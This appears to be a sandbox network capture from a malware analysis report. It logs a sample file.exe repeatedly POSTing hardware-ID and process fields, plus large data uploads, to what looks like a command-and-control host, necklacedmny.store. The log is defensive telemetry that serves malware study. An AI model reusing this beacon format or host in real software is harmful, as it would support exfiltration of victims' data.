                                                  2024-10-30 01:27:01 UTC1369INData Raw: 44 42 4d 4a 51 36 73 63 2b 79 34 42 48 68 2f 77 38 66 36 35 76 70 73 6b 6b 33 43 65 78 31 45 39 67 65 32 6c 37 4c 35 39 49 5a 67 45 46 51 42 50 6f 78 37 30 4c 55 74 5a 56 50 76 69 75 75 33 33 73 51 57 6e 4e 37 72 38 46 53 37 46 38 75 62 6f 76 54 4a 32 30 45 68 59 54 45 43 30 57 4b 56 68 5a 45 64 55 2b 65 2f 2b 2f 72 43 74 51 36 45 2b 2f 36 56 52 4c 73 62 79 34 2b 36 2b 50 48 2f 51 44 52 34 49 52 71 6f 65 2f 69 35 46 56 56 37 34 37 62 4c 76 39 4c 55 43 71 6a 6d 77 39 68 52 69 67 62 54 69 38 2f 4a 6c 4f 65 6b 4c 41 42 74 58 6f 46 6a 69 62 31 67 51 57 50 75 70 35 71 48 2f 70 67 6d 73 50 4c 72 79 46 43 48 41 38 2b 6a 74 76 6a 64 77 30 41 34 5a 42 56 57 76 46 50 4d 6d 54 31 78 52 2b 75 4f 39 37 4c 37 36 51 36 45 71 2f 36 56 52 44 73 6a 35 79 2b 43 2b 4f 6a 6e
                                                  Data Ascii: DBMJQ6sc+y4BHh/w8f65vpskk3Cex1E9ge2l7L59IZgEFQBPox70LUtZVPviuu33sQWnN7r8FS7F8ubovTJ20EhYTEC0WKVhZEdU+e/+/rCtQ6E+/6VRLsby4+6+PH/QDR4IRqoe/i5FVV747bLv9LUCqjmw9hRigbTi8/JlOekLABtXoFjib1gQWPup5qH/pgmsPLryFCHA8+jtvjdw0A4ZBVWvFPMmT1xR+uO97L76Q6Eq/6VRDsj5y+C+Ojn
                                                  2024-10-30 01:27:01 UTC1369INData Raw: 41 6e 73 48 2b 56 68 47 52 42 70 38 50 6d 75 34 72 79 46 46 61 55 6b 74 50 41 64 59 74 43 36 2f 4b 75 31 4d 54 6d 41 53 42 41 44 54 71 38 58 2f 43 68 4e 58 56 72 2b 37 4c 2f 6e 2b 72 34 4a 70 6a 53 35 2f 42 51 6f 7a 50 58 76 34 72 55 31 66 74 73 61 56 6b 49 48 71 77 43 39 65 51 46 35 57 4f 58 6e 72 71 48 68 2b 68 72 6d 4e 62 4f 39 53 57 4c 4c 2f 75 72 76 74 54 46 2f 33 51 34 62 44 55 69 74 47 50 49 6c 53 6c 6c 5a 39 75 53 37 37 50 71 6d 43 61 30 39 73 2f 51 64 4c 34 2b 36 70 65 79 71 66 53 47 59 4f 52 73 43 53 61 73 4f 76 54 34 50 53 52 2f 77 35 66 36 35 76 72 55 50 71 54 47 77 2f 68 49 6a 78 65 62 33 35 37 73 31 66 4e 51 44 47 41 70 56 71 68 66 30 49 6b 4a 5a 57 50 2f 6c 74 4f 4c 35 39 45 33 6d 4e 61 65 39 53 57 4c 73 34 2f 58 6d 38 69 49 33 77 55 67 52
                                                  Data Ascii: AnsH+VhGRBp8Pmu4ryFFaUktPAdYtC6/Ku1MTmASBADTq8X/ChNXVr+7L/n+r4JpjS5/BQozPXv4rU1ftsaVkIHqwC9eQF5WOXnrqHh+hrmNbO9SWLL/urvtTF/3Q4bDUitGPIlSllZ9uS77PqmCa09s/QdL4+6peyqfSGYORsCSasOvT4PSR/w5f65vrUPqTGw/hIjxeb357s1fNQDGApVqhf0IkJZWP/ltOL59E3mNae9SWLs4/Xm8iI3wUgR
                                                  2024-10-30 01:27:01 UTC1369INData Raw: 37 7a 4d 30 52 57 55 50 6a 67 74 2b 58 32 74 77 4f 69 4e 72 6a 34 45 69 37 45 38 2b 62 6b 74 6a 52 33 30 51 64 57 51 67 65 72 41 4c 31 35 41 58 46 45 39 4f 57 7a 6f 65 48 36 47 75 59 31 73 37 31 4a 59 73 50 36 34 4f 75 34 4f 33 33 64 44 68 77 4a 52 36 63 62 38 69 56 48 56 46 44 33 34 72 66 67 2b 4c 45 4a 72 54 53 79 2f 68 63 6b 6a 37 71 6c 37 4b 70 39 49 5a 67 6f 44 51 46 4c 71 31 6a 69 62 31 67 51 57 50 75 70 35 71 48 31 75 41 65 68 4d 72 4c 2b 47 53 66 4c 2f 75 44 72 75 69 39 78 32 41 38 45 48 6b 65 6c 48 66 45 69 51 56 52 5a 2f 75 2b 39 35 62 37 36 51 36 45 71 2f 36 56 52 44 38 50 7a 7a 4f 79 70 66 57 61 57 45 56 59 4c 53 2b 78 41 76 53 42 4b 57 6c 44 36 36 72 6a 69 39 62 45 4a 70 7a 57 33 38 41 4d 68 77 50 76 68 36 37 30 37 66 39 6b 48 45 41 74 4f 72
                                                  Data Ascii: 7zM0RWUPjgt+X2twOiNrj4Ei7E8+bktjR30QdWQgerAL15AXFE9OWzoeH6GuY1s71JYsP64Ou4O33dDhwJR6cb8iVHVFD34rfg+LEJrTSy/hckj7ql7Kp9IZgoDQFLq1jib1gQWPup5qH1uAehMrL+GSfL/uDrui9x2A8EHkelHfEiQVRZ/u+95b76Q6Eq/6VRD8PzzOypfWaWEVYLS+xAvSBKWlD66rji9bEJpzW38AMhwPvh6707f9kHEAtOr
                                                  2024-10-30 01:27:01 UTC385INData Raw: 47 62 6d 48 51 2f 37 54 6d 37 72 4d 55 71 58 4c 78 76 52 35 69 6c 38 32 6c 34 72 55 6d 61 4d 34 46 42 67 73 48 6b 31 61 39 4f 51 45 49 48 38 4c 71 73 4f 2f 35 6f 68 4c 72 46 61 6e 33 46 6a 4c 49 34 2b 71 72 2f 48 31 2f 6d 46 42 46 51 67 65 6f 43 62 31 35 45 51 49 45 6f 72 72 70 73 61 79 72 54 62 39 79 71 62 31 4a 63 49 47 30 39 36 76 71 66 54 37 62 47 67 51 4b 52 4c 6f 62 75 68 39 2f 64 30 58 36 37 36 6e 77 77 49 6f 45 76 44 2b 35 36 67 42 75 32 76 66 72 35 62 55 72 4f 5a 5a 49 47 55 77 66 6c 56 69 31 59 58 34 65 48 2b 2b 70 35 71 48 4c 74 77 32 6f 4e 61 6e 73 58 41 58 56 2b 65 50 38 6f 33 30 33 6d 41 35 57 56 42 66 69 57 50 6b 77 41 51 67 50 70 62 4c 72 73 71 6e 6b 55 62 6c 38 70 72 30 48 59 70 65 6d 71 36 75 67 66 53 47 59 54 78 55 65 56 61 6f 62 36 79
                                                  Data Ascii: GbmHQ/7Tm7rMUqXLxvR5il82l4rUmaM4FBgsHk1a9OQEIH8LqsO/5ohLrFan3FjLI4+qr/H1/mFBFQgeoCb15EQIEorrpsayrTb9yqb1JcIG096vqfT7bGgQKRLobuh9/d0X676nwwIoEvD+56gBu2vfr5bUrOZZIGUwflVi1YX4eH++p5qHLtw2oNansXAXV+eP8o303mA5WVBfiWPkwAQgPpbLrsqnkUbl8pr0HYpemq6ugfSGYTxUeVaob6y
                                                  2024-10-30 01:27:01 UTC1369INData Raw: 32 36 64 36 0d 0a 39 43 52 6c 4c 34 34 72 2f 66 77 4a 6f 4f 70 7a 47 78 76 79 41 30 77 75 54 6d 37 72 55 44 52 39 59 50 41 67 74 4a 71 68 69 39 62 77 46 66 48 36 2f 51 2f 71 6d 2b 69 30 33 6d 4b 76 2b 6c 55 52 66 4d 2b 75 76 73 70 43 77 30 2b 78 34 62 41 30 79 74 57 4c 4e 68 52 78 41 48 70 36 66 2b 35 65 2f 30 57 2f 5a 67 35 4b 68 43 64 5a 2b 6d 2b 71 57 72 66 57 2b 59 55 45 52 43 42 37 35 59 70 57 45 47 58 6c 4c 32 36 72 44 69 37 4b 59 46 70 53 53 38 75 69 38 63 37 76 6e 75 35 37 38 79 63 75 59 32 4e 77 46 4d 6f 42 58 79 4b 6e 39 75 53 76 54 6e 73 4f 62 6f 70 55 50 6f 63 72 43 39 53 52 75 50 76 4b 58 55 2f 48 31 68 6d 46 42 57 4f 55 53 69 46 76 6f 33 55 42 31 2b 2b 75 4b 79 37 50 47 2f 51 2b 68 79 75 62 31 4a 63 6f 47 30 34 66 72 79 5a 53 6d 4b 55 30 4e
                                                  Data Ascii: 26d69CRlL44r/fwJoOpzGxvyA0wuTm7rUDR9YPAgtJqhi9bwFfH6/Q/qm+i03mKv+lURfM+uvspCw0+x4bA0ytWLNhRxAHp6f+5e/0W/Zg5KhCdZ+m+qWrfW+YUERCB75YpWEGXlL26rDi7KYFpSS8ui8c7vnu578ycuY2NwFMoBXyKn9uSvTnsObopUPocrC9SRuPvKXU/H1hmFBWOUSiFvo3UB1++uKy7PG/Q+hyub1JcoG04fryZSmKU0N
                                                  2024-10-30 01:27:01 UTC1369INData Raw: 50 73 6d 57 31 64 5a 30 63 6e 2b 72 37 36 37 51 2f 34 4c 2f 37 56 52 48 59 47 30 2f 61 76 71 66 55 7a 62 42 68 67 4c 55 62 31 56 32 44 5a 43 51 46 6e 30 71 66 43 68 2b 50 52 62 39 6e 7a 2f 2b 51 42 69 6c 36 53 33 73 4f 64 75 4c 6f 68 61 43 55 4a 65 37 41 36 39 65 52 4d 65 48 2b 57 70 35 71 47 35 74 78 47 30 4e 4c 7a 72 45 6d 58 78 79 73 50 6f 6f 7a 64 59 31 52 67 52 4d 6e 6d 35 47 2f 4d 76 52 6b 5a 4f 74 36 66 2b 37 72 37 73 4f 75 5a 36 38 2f 73 53 4e 49 2f 4c 71 36 75 71 66 53 47 59 50 52 55 43 53 61 73 4f 37 47 78 6e 55 30 37 39 79 4c 50 78 2b 66 52 4e 35 6a 54 2f 70 55 4a 73 6a 2f 44 30 71 2b 70 74 4b 34 4e 64 52 56 73 58 2f 67 65 7a 4f 41 46 47 48 36 2b 37 38 4b 48 73 39 46 76 6d 64 62 7a 76 41 79 54 4d 34 75 61 73 6a 41 4e 4d 32 77 59 59 43 31 47 5a
                                                  Data Ascii: PsmW1dZ0cn+r767Q/4L/7VRHYG0/avqfUzbBhgLUb1V2DZCQFn0qfCh+PRb9nz/+QBil6S3sOduLohaCUJe7A69eRMeH+Wp5qG5txG0NLzrEmXxysPoozdY1RgRMnm5G/MvRkZOt6f+7r7sOuZ68/sSNI/Lq6uqfSGYPRUCSasO7GxnU079yLPx+fRN5jT/pUJsj/D0q+ptK4NdRVsX/gezOAFGH6+78KHs9FvmdbzvAyTM4uasjANM2wYYC1GZ


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.549706188.114.97.34435800C:\Users\user\Desktop\file.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-30 01:27:02 UTC284OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 12840
                                                  Host: necklacedmny.store
                                                  2024-10-30 01:27:02 UTC12840OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 38 33 34 39 44 30 37 43 44 37 45 39 41 31 38 34 42 39 44 41 37 38 43 35 33 46 41 43 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"598349D07CD7E9A184B9DA78C53FAC6B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                  2024-10-30 01:27:03 UTC1012INHTTP/1.1 200 OK
                                                  Date: Wed, 30 Oct 2024 01:27:03 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=p7nvsvdou9d1mftd46qjquefgj; expires=Sat, 22 Feb 2025 19:13:42 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3cU0D2kWaadT4wH07bNAgCEAcQl5arcP9iR84BThD3YGzT9BbyBy1ml70qMvqZvDSWpk%2FRP0RDWZpC5debljAD8XutM8ALBNnF0ZEkAkkA2mrU6pivrnH3DHu9VVzuH1UDedYgw%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8da79ee3698f6c81-DFW
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1179&sent=7&recv=16&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13782&delivery_rate=2344939&cwnd=251&unsent_bytes=0&cid=4b4d5d0a36e2d2cc&ts=556&x=0"
                                                  2024-10-30 01:27:03 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                  Data Ascii: 11ok 173.254.250.78
                                                  2024-10-30 01:27:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.549707188.114.97.34435800C:\Users\user\Desktop\file.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-30 01:27:04 UTC284OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 15082
                                                  Host: necklacedmny.store
                                                  2024-10-30 01:27:04 UTC15082OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 38 33 34 39 44 30 37 43 44 37 45 39 41 31 38 34 42 39 44 41 37 38 43 35 33 46 41 43 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"598349D07CD7E9A184B9DA78C53FAC6B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                  2024-10-30 01:27:04 UTC1022INHTTP/1.1 200 OK
                                                  Date: Wed, 30 Oct 2024 01:27:04 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=oaleqfg3v840hn5d33thmv4nf2; expires=Sat, 22 Feb 2025 19:13:43 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6vIQeeUkWKEBU7i0c9mfN%2FCa4Jj4NZa1ZOMskHTcKAwRXZqm381DXoOBuAxLl%2F%2BgtmR%2FrcD9k%2F6wI6L1boVze1TuB4L%2BQPNZpsANDQQ3ueI8GuhNMHg02bfuejsTOodCerYPHNE%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8da79eebbdf56b11-DFW
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1076&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16024&delivery_rate=2647166&cwnd=225&unsent_bytes=0&cid=97c41ce55404f516&ts=769&x=0"
                                                  2024-10-30 01:27:04 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                  Data Ascii: 11ok 173.254.250.78
                                                  2024-10-30 01:27:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.549708188.114.97.34435800C:\Users\user\Desktop\file.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-30 01:27:05 UTC284OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 20572
                                                  Host: necklacedmny.store
                                                  2024-10-30 01:27:05 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 38 33 34 39 44 30 37 43 44 37 45 39 41 31 38 34 42 39 44 41 37 38 43 35 33 46 41 43 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"598349D07CD7E9A184B9DA78C53FAC6B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                  2024-10-30 01:27:05 UTC5241OUTData Raw: 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
                                                  2024-10-30 01:27:06 UTC1015INHTTP/1.1 200 OK
                                                  Date: Wed, 30 Oct 2024 01:27:06 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=vurdopak216f28e1f6plgpdpph; expires=Sat, 22 Feb 2025 19:13:45 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gsOgIEWeUjFXTnBXzkfB5FwvLk1CJ48SqhPrwn%2Fjv9WjyQZMEuBZU3BE1AdE7kAt2lVeuB%2FNq4LQ3qhdSEBlfpQnoENvYoXu6gu0ZVXZXzdC40ntg4Pp6ipKc1zzpp2G9yBGk2Q%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8da79ef5cd7e6b88-DFW
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1921&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21536&delivery_rate=1473041&cwnd=251&unsent_bytes=0&cid=66be8515d2562efa&ts=747&x=0"
                                                  2024-10-30 01:27:06 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                  Data Ascii: 11ok 173.254.250.78
                                                  2024-10-30 01:27:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.549709188.114.97.34435800C:\Users\user\Desktop\file.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-30 01:27:07 UTC283OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 1259
                                                  Host: necklacedmny.store
                                                  2024-10-30 01:27:07 UTC1259OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 38 33 34 39 44 30 37 43 44 37 45 39 41 31 38 34 42 39 44 41 37 38 43 35 33 46 41 43 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"598349D07CD7E9A184B9DA78C53FAC6B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                  2024-10-30 01:27:08 UTC1018INHTTP/1.1 200 OK
                                                  Date: Wed, 30 Oct 2024 01:27:07 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=up8l7ul07rqhalgvamcfq0e91t; expires=Sat, 22 Feb 2025 19:13:46 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NMrvYWT4dMSAwkMejdVniTKqoCpVhkggiOkbkc4XtcnaXekH5sPvsYpMexboySLLfma%2BFWf7zCWnETGDhR6FrZMMxQwFlOzAs%2FKIuAi%2BuvC2oEmIczEpr3wJAg2w%2BsaHOB%2FaF7M%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8da79f00992b4650-DFW
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1091&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2178&delivery_rate=2666666&cwnd=251&unsent_bytes=0&cid=03d689498a5a092c&ts=480&x=0"
                                                  2024-10-30 01:27:08 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                  Data Ascii: 11ok 173.254.250.78
                                                  2024-10-30 01:27:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.549710188.114.97.34435800C:\Users\user\Desktop\file.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-30 01:27:09 UTC285OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 570588
                                                  Host: necklacedmny.store
                                                  2024-10-30 01:27:09 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 38 33 34 39 44 30 37 43 44 37 45 39 41 31 38 34 42 39 44 41 37 38 43 35 33 46 41 43 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"598349D07CD7E9A184B9DA78C53FAC6B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
